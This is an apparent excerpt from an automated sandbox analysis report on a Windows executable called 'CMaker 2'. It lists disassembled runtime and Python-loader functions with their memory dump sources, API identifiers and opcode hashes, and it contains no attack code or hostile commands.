                                                                                                                                                                                  • Instruction Fuzzy Hash: EA218172A18A4287DB61CF58E44037976B0EB84B94F589274EAADC76DAFF7DD4008B00
                                                                                                                                                                                  Function 00007FF6FABEE7B4 Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: e49820b8979c690efdc8f417affac154591ffe1afff9525a5d7d63ed5cda887b
                                                                                                                                                                                  • Instruction ID: d2e8a9e5d977c947a657a9c427837112b747ae5b647d703ec3207a73020cad26
                                                                                                                                                                                  • Opcode Fuzzy Hash: e49820b8979c690efdc8f417affac154591ffe1afff9525a5d7d63ed5cda887b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8801C865A1878241EB04DB529940079AA95BF86FE0F8C82B4DE7C97BD6EF7CE4018700
                                                                                                                                                                                  Function 00007FF6FABF7AB0 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: e4f567e3a19c005c49da197f73f21ba5d7ee1f9e2fe88391b5d22af82dd2e2e8
                                                                                                                                                                                  • Instruction ID: c49053492b93b57508826deb03dc04dc76e046a450f41101e003b5247a60bbf2
                                                                                                                                                                                  • Opcode Fuzzy Hash: e4f567e3a19c005c49da197f73f21ba5d7ee1f9e2fe88391b5d22af82dd2e2e8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4001842CE1D68341FF546BE1694117952B4AF03790F9C55FDE93DC2AC7FE2DA4918200
                                                                                                                                                                                  Function 00007FF6FAC07CD4 Relevance: 1.5, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00007FF6FABFD444: HeapAlloc.KERNEL32(?,?,?,00007FF6FABFD3AD,?,?,?,00007FF6FABF105F), ref: 00007FF6FABFD482
                                                                                                                                                                                  • RtlReAllocateHeap.NTDLL(?,?,00000000,00007FF6FAC0323B,?,?,?,00007FF6FABF9B57,?,?,?,00007FF6FABF9A4D,?,?,?,00007FF6FABF9E2E), ref: 00007FF6FAC07D41
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Heap$AllocAllocate
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2177240990-0
                                                                                                                                                                                  • Opcode ID: ae69f3f87eae71f9e6285b2100481e95f613aacc1c1392977414a10ce1b11ecd
                                                                                                                                                                                  • Instruction ID: 31b8564022fc450fd39256388690db01ab6e283b0b869b81bf698d171e16fceb
                                                                                                                                                                                  • Opcode Fuzzy Hash: ae69f3f87eae71f9e6285b2100481e95f613aacc1c1392977414a10ce1b11ecd
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A016D94F1CB4380FF6C6B63A54127912B06F85BA0F58E6B5DD3ECA2C6FE2CE4404610
                                                                                                                                                                                  Function 00007FF6FABEB27C Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6FABEB290
                                                                                                                                                                                    • Part of subcall function 00007FF6FABEBCB8: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF6FABEBCC0
                                                                                                                                                                                    • Part of subcall function 00007FF6FABEBCB8: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF6FABEBCC5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1208906642-0
                                                                                                                                                                                  • Opcode ID: e406b6a13abdc1de8099012e77fa9b1984323fd7cc8c2502f81400eb426856bf
                                                                                                                                                                                  • Instruction ID: d88ef5c0772c5416629be275dd50af88210be3c188cf798299d2cdc07582ba01
                                                                                                                                                                                  • Opcode Fuzzy Hash: e406b6a13abdc1de8099012e77fa9b1984323fd7cc8c2502f81400eb426856bf
                                                                                                                                                                                  • Instruction Fuzzy Hash: 00E0E224D1D24381FFA92BA195C63BC0B801F63345FC098F9D87EE22C3BE0E74862621
                                                                                                                                                                                  Function 00007FF6FABF7DEC Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: e8a23966574a6a3d2edb6134bf375df8a5be86d2f78f2125052a9c69a71dc0e7
                                                                                                                                                                                  • Instruction ID: df4a62a92024d4ff156cb6ecb220791efb757d5b8f8c9fd2bba33392e95afda3
                                                                                                                                                                                  • Opcode Fuzzy Hash: e8a23966574a6a3d2edb6134bf375df8a5be86d2f78f2125052a9c69a71dc0e7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 90E0EC6CE6820746FF153AE549831B911248F16340FDC44FDDA29C62D7FE1C6D955621
                                                                                                                                                                                  Function 00007FF6FABFEB84 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,00000000,00007FF6FABFAEAA,?,?,?,00007FF6FABFB111,?,?,?,?,00007FF6FABFA012), ref: 00007FF6FABFEBD9
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                  • Opcode ID: c8b9bc297ccf02c34bc4185cf4e45d41bb4c7179ccb82eebce59f868c6ce7279
                                                                                                                                                                                  • Instruction ID: 8eb983a54ec2f80432d26435a3a5141e26449c1f0029748d0438bcef924574f5
                                                                                                                                                                                  • Opcode Fuzzy Hash: c8b9bc297ccf02c34bc4185cf4e45d41bb4c7179ccb82eebce59f868c6ce7279
                                                                                                                                                                                  • Instruction Fuzzy Hash: 86F06D4CB0D20785FF685AE599813B952945FC6B80F8C50B9C92FC63C7FD2DE4808220
                                                                                                                                                                                  Function 00007FF6FABFD444 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,?,00007FF6FABFD3AD,?,?,?,00007FF6FABF105F), ref: 00007FF6FABFD482
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                  • Opcode ID: 518377c8398ba572112478f17d195ad13ea908693e0d1cf717003d4179de8268
                                                                                                                                                                                  • Instruction ID: ab8cfafde7a397d9b1bbcd76148687cc9f4a81d96efdd2950c31e89f5d898a40
                                                                                                                                                                                  • Opcode Fuzzy Hash: 518377c8398ba572112478f17d195ad13ea908693e0d1cf717003d4179de8268
                                                                                                                                                                                  • Instruction Fuzzy Hash: F1F01C59B1D24785FF646BE2584137912915F867B4F8C97B8DD3EC62C2FE2CF4804260

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Function 00007FF6FABE42E0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE42F0
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE4331
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE4356
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE437B
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE43A3
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE43CB
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE43F3
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE441B
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE4443
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                  • API String ID: 190572456-2007157414
                                                                                                                                                                                  • Opcode ID: 6a244b584105566801507efa4892542c2e2cca56cf1b8684858a7b7b26d5cccb
                                                                                                                                                                                  • Instruction ID: 2baaca0cd607ce0177c95d83cca8cf8e82db03c9bafb6c725dcb4c07420af4fa
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a244b584105566801507efa4892542c2e2cca56cf1b8684858a7b7b26d5cccb
                                                                                                                                                                                  • Instruction Fuzzy Hash: F7127DE4A1DB4390FB59CB44A8901B422B1BF4A745B94A1F6CA3ED23E0FF7DB558D240
                                                                                                                                                                                  Function 00007FF6FAC03EAC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                  • API String ID: 808467561-2761157908
                                                                                                                                                                                  • Opcode ID: 250eb075c7eb48b10284d3accfb3e91cb15d64f7079c4daa12e19f76ef41a5d1
                                                                                                                                                                                  • Instruction ID: 90b083a36fb890aaff95fef8f975b8fd667de9baf745274fb5656145d64da4a1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 250eb075c7eb48b10284d3accfb3e91cb15d64f7079c4daa12e19f76ef41a5d1
                                                                                                                                                                                  • Instruction Fuzzy Hash: D5B2C6B2A182828BE7648F65D6407FE77B1FB54348F44A175DA2DD7AC4EF38A900CB40
                                                                                                                                                                                  Function 00007FF6FABE911D Relevance: 12.0, Strings: 9, Instructions: 744COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                  • API String ID: 0-2665694366
                                                                                                                                                                                  • Opcode ID: 26bba0e386051ca0755ea61f277e00a0bceac020678a7f97c30128c98cea2ffa
                                                                                                                                                                                  • Instruction ID: f10ed73ed05913acdfd96b1ffa960264253e84943d99a3859ece6b3925bb145c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 26bba0e386051ca0755ea61f277e00a0bceac020678a7f97c30128c98cea2ffa
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5852F276A146A68BE7A48F14C498B7E7BE9FB45340F4141B9E65AC77C0EF38E844CB40
                                                                                                                                                                                  Function 00007FF6FABEB59C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                                  • Opcode ID: dec8059712e99081e2e259c55c2c48a2db8476306f1af611de12d5d4c368715b
                                                                                                                                                                                  • Instruction ID: 0045311956e5186c29c67de8a5ab8b0c4e4de97af8b213559da2212c99dbf03d
                                                                                                                                                                                  • Opcode Fuzzy Hash: dec8059712e99081e2e259c55c2c48a2db8476306f1af611de12d5d4c368715b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 72312FB2618B818AEB60DF60E8943EA7374FB95744F44807ADA5E87B94EF38D548C710
                                                                                                                                                                                  Function 00007FF6FABFA1D8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                                                  • Opcode ID: 18bd89ddc904fac5e08f82f97f687fabcb8e5781267cf91c135aead5cf591e4d
                                                                                                                                                                                  • Instruction ID: 282429c43bfb8495d300850a47afc26408b8fa51c429091b6638823b427b164c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 18bd89ddc904fac5e08f82f97f687fabcb8e5781267cf91c135aead5cf591e4d
                                                                                                                                                                                  • Instruction Fuzzy Hash: A9319176618F8186DB60CF25E8402AE73B4FB89754F544179EAAD83B98EF3CC545CB00
                                                                                                                                                                                  Function 00007FF6FAC01674 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
